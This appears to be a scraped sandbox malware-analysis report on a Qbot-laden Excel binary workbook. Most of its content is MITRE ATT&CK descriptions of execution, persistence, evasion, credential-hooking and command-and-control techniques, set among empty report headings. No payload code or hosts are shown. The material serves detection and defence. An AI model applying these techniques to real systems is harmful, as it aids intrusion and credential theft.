Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report audit-1133808478.xlsb

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Qbot

Yara Overview

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Persistence and Installation Behavior:

Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "audit-1133808478.xlsb"

Indicators

Macro 4.0 Code

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

Function 00B32559, Relevance: 3.2, APIs: 1, Instructions: 1688
memoryCOMMONCrypto

Function 00B34CC2, Relevance: 3.0, APIs: 1, Instructions: 1510
COMMON

Function 00B3572B, Relevance: 2.2, APIs: 1, Instructions: 686
COMMON

Function 00B358C5, Relevance: 2.2, APIs: 1, Instructions: 656
libraryCOMMON

Function 00B348FB, Relevance: 3.1, APIs: 2, Instructions: 79
memoryCOMMON

Function 00B3111C, Relevance: 2.7, Strings: 1, Instructions: 1484
COMMONCrypto

Function 00B31F7B, Relevance: 1.7, Strings: 1, Instructions: 453
COMMONCrypto

Function 00B33E7B, Relevance: .7, Instructions: 675
COMMON

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre